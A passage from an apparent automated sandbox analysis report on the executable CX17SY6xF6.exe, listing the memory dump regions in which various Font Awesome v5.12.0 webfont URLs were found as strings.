00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot?#iefix
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.svg#fontawesome
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.ttf
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot?#iefix
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.svg#fontawesome
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.ttf
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff2
